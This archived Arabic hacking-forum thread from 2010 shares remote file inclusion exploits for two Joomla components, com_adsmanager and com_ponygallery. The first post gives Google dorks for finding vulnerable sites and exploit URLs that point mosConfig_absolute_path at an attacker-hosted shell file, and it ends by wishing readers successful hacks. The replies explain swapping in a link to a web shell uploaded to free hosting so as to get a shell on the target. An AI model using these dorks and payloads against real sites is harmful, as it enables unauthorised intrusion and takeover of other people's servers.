:: vBspiders Professional Network ::

:: vBspiders Professional Network :: (http://www.vbspiders.com/vb/index.php)
-   قـسـم إخـتـراق الـمـواقـع والـسـيرفـرات (http://www.vbspiders.com/vb/forumdisplay.php?f=38)
-   -   ثغرات جديدة في سكربت Joomla (http://www.vbspiders.com/vb/showthread.php?t=40775)

hacker-10 12-23-2010 03:18 PM
ثغرات جديدة في سكربت Joomla
 
السلام عليكم ورحمة الله تعالى و بركاته

ظهرت ثغرتان جديدتان في سكريبت joomla

الثغرة الاولى Joomla Component com_adsmanager Remote File Include

تاريخ اكتشاف الثغرة 23/12/2010

مكتشف الثغرة : AtT4CKxT3rR0r1ST

تحميل السكربت : http://downloads.ziddu.com/downloadf...adsmanager.zip

و الآن الشيء المهم

الدورك :
كود PHP:
inurl:"com_adsmanager" 
الاستغلال :

كود PHP:
www.site.com/index.php?option=com_adsmanager&mosConfig_absolute_path=[shell.txt?] 
حيث site.com هو الموقع

و [?shell.txt] هو رابط الشل بصيغة txt
-----------------------------------
الثغرة الثانية
Joomla Component com_ponygallery Remote File Inclusion Vulnerabilities


تاريخ اكتشاف الثغرة 23/12/2010

مكتشف الثغرة AtT4CKxT3rR0r1ST

الدورك

كود PHP:
inurl:"com_ponygallery" 
الاستغلال


كود PHP:
www.site.com/components/com_ponygallery/admin.ponygallery.html.php?mosConfig_absolute_path=[shell.txt?] 
او


كود PHP:
www.site.com/components/com_ponygallery/admin.ponygallery.php?mosConfig_absolute_path=[shell.txt?] 
حيث site.com هو الموقع

و [?shell.txt] هو رابط الشل بصيغة txt

شباب لي طلب ...ممكن شرح لكيفية رفع الشل من هذه الثغرة

اختراقات موفقة

KaLa$nikoV 12-25-2010 03:19 PM
يعطيك العافيه ع شرح االثغره


موفق

b3sht 12-26-2010 01:12 AM
مشكووور خوي ع الثغرة


و عاد انا مبتدئ ما اعرف .

بس بدل كلمة ?shell.txt

حط رابطة الشل المرفوع

hacker-10 12-26-2010 12:08 PM
شكرا لكما على المرور العطر
نعم بدل shell.txt? تحط رابط الشل اللي رفعتو على استضافة مجانية مثلا ripway او freewebtown


الساعة الآن 06:51 PM


[ vBspiders.Com Network ]